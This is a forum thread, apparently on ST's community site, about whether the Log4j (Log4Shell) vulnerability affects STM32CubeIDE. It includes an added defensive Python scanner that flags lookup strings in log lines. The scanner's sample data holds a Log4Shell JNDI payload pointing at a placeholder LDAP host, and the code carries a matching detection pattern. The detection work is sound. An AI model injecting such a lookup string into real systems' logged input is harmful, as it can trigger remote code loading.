
Uwe Bonnes
Chief
December 15, 2021

Sorry, somehow I managed to drop the question:

During startup, stcube prints a message about log4j. There are known vulnerabilities in log4j. How does this impact stcube and the host system stcube runs on?

TDK
Super User
December 15, 2021
"If you feel a post has answered your question, please click "Accept as Solution"."
waclawek.jan
Super User
December 15, 2021

I wonder how exactly an outside attacker could get an entry inserted into CubeIDE/CubeWhatever's log...

Do these programs have open listening IP ports?

JW

TDK
Super User
December 15, 2021

It will try to format the log message and if you have certain patterns in the message being logged, it will load an arbitrary file from a web address to do so. So if you can control what is being logged, perhaps if the program logs user input, you're toast.

It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep that it is even possible for this to happen. I'm not surprised it happened in Java.

I find it all quite interesting.

https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html

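The mechanism TDK describes (a lookup pattern inside a logged string makes log4j fetch something remote) turns into a straightforward defender's check: does any text that reaches the logger contain a `${...}` lookup at all? The following is an added example, not code from this thread, from ST or from the log4j project. It scans a few constructed log lines, flags lines whose lookup names `jndi` as critical, and flags any other lookup inside a user-supplied field for review, since a log field like a user agent has no legitimate reason to carry one. The field names and sample lines are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample log lines (not taken from the thread). Lines 2 and 4 carry
# Log4j-style lookups; line 2 names the JNDI lookup that Log4Shell abuses.
SAMPLE_LOG = [
    '2021-12-15 10:02:11 INFO  user-agent="Mozilla/5.0 (X11; Linux x86_64)"',
    '2021-12-15 10:02:12 INFO  user-agent="${jndi:ldap://example.invalid/a}"',
    '2021-12-15 10:02:13 INFO  build started',
    '2021-12-15 10:02:14 INFO  user-agent="${env:BUILD_ID}"',
]

# Matches the start of a JNDI lookup; case-insensitive because log4j is.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def extract_lookups(text: str) -> List[str]:
    """Return every ${...} lookup in text, innermost first, including nested
    ones such as ${a:${b}}, by matching braces instead of a regex."""
    found: List[str] = []
    stack: List[int] = []  # positions of unmatched "${"
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            found.append(text[start:i + 1])
        i += 1
    return found


def classify_line(line: str) -> Dict[str, object]:
    """Classify one log line: 'critical' if it contains a JNDI lookup,
    'review' if it contains any other lookup, otherwise 'clean'."""
    lookups = extract_lookups(line)
    jndi = [lk for lk in lookups if JNDI_RE.search(lk)]
    if jndi:
        severity = "critical"
    elif lookups:
        severity = "review"
    else:
        severity = "clean"
    return {"severity": severity, "lookups": lookups, "jndi": jndi}


def scan_log(lines: List[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Return (line number, classification) for every non-clean line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify_line(line)
        if result["severity"] != "clean":
            hits.append((number, result))
    return hits


if __name__ == "__main__":
    for number, result in scan_log(SAMPLE_LOG):
        print(f"line {number}: {result['severity']} lookups={result['lookups']}")
```

The check is only as good as the answer to JW's question: it matters for CubeIDE only if some attacker-controlled text (a file name, a project setting, a network response) ever reaches a log4j logger on a version that still resolves lookups; on a host with no such path there is nothing to find.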
Piranha
Principal III
December 20, 2021

> It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep

That is also the past and future of the CubeMX. It started as a Microcontroller eXplorer and helped manage pins and clocks. Then the "initialization code generator" was added. Officially it's still called that! But in reality it has gone down the full - "I'm clicking a project together completely in CubeMX. Something doesn't work. I no learn C. Help!!! Thank you, ser!" - mode. And even sane users want more and more customization. Initialization order, priorities, enable/disable by default etc. Eventually it will mimic all of the HAL in a million configurations, it will require the same amount of knowledge and be more complex to configure than writing code, and the project will collapse under its own weight.

waclawek.jan
Super User
December 16, 2021

I understand the mechanism of the bug. My question was towards how

> if you can control what is being logged,

can happen in the particular case of Cube.

JW

waclawek.jan
Best answer
Super User
December 18, 2021